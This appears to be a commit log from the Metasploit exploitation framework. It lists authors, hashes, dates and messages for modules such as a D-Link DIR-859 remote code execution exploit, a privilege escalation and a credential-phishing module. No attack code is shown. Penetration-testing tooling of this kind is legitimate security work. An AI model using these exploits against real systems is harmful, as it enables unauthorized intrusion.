Dhiraj Mishra	13b72282a6	Update modules/auxiliary/scanner/http/tvt_nvms_traversal.rb Co-Authored-By: acammack-r7 <adam_cammack@rapid7.com>	2020-01-05 12:53:38 +04:00
Dhiraj Mishra	4b9685005e	Update modules/auxiliary/scanner/http/tvt_nvms_traversal.rb Co-Authored-By: acammack-r7 <adam_cammack@rapid7.com>	2020-01-05 12:53:03 +04:00
Dhiraj Mishra	da06ecc83b	Update modules/auxiliary/scanner/http/tvt_nvms_traversal.rb Co-Authored-By: acammack-r7 <adam_cammack@rapid7.com>	2020-01-05 12:52:47 +04:00
h00die	4d273a94b6	cleanup spaces at eol	2020-01-04 13:51:56 -05:00
h00die	0edaf1fc54	add optimize kernel to hashcat	2020-01-04 13:38:48 -05:00
Brendan Coles	c8fb76182c	Use PROGRAMDATA environment variable	2020-01-03 20:32:01 +00:00
Brendan Coles	b3e9d9aee9	Add Plantronics Hub SpokesUpdateService Privilege Escalation	2020-01-03 20:13:27 +00:00
Brent Cook	30ddabba92	add PROTOCOL option for sunrpc_portmapper	2020-01-02 09:52:18 -06:00
Dhiraj Mishra	e23c67d129	tvt_nvms_traversal.md	2020-01-01 15:34:04 +05:30
Dhiraj Mishra	1263292cde	tvt_nvms_traversal.rb	2020-01-01 15:06:18 +05:30
secenv	0d592a3fca	Replace send_request_cgi with send_request_raw msftidy complains about not using vars_get... Which won't work in this case.	2019-12-31 13:36:09 -03:00
secenv	b6731a6d1c	Remove printf as flavor There is no printf in this router.	2019-12-31 13:10:59 -03:00
secenv	bedb1132b7	Convert to staged exploit Works with meterpreter now :D	2019-12-31 13:08:51 -03:00
secenv	5f2c29946c	Remove the prompt variable + some EOL spaces; modify rand() As suggested by @bcoles	2019-12-31 11:19:59 -03:00
secenv	2eec026a28	D-Link DIR-859 Unauthenticated RCE (CVE-2019-17621) Exploits a vulnerability in the /gena.cgi UPnP endpoint in D-Link DIR-859 (and potentially other) SOHO routers. CVE ID: 2019-17621. Code based on modules/exploits/linux/http/dlink_dir300_exec_telnet.rb	2019-12-30 19:22:04 -03:00
Brendan Coles	d449a93b44	Add Msf::Post::File.attributes method	2019-12-25 07:34:44 +00:00
Brendan Coles	f04cf4f544	Randomize Msf::Post::File _write_file_unix_shell test_str	2019-12-25 05:15:33 +00:00
Kenneth LaCroix	473dcd5359	Create phish_windows_credentials.md	2019-12-17 18:55:45 -07:00
Kenneth LaCroix	ba25cb3b31	Update enum_patches.md	2019-12-15 16:46:55 -07:00
Kenneth LaCroix	3257b8b4cc	enum_patches	2019-12-14 15:58:45 -07:00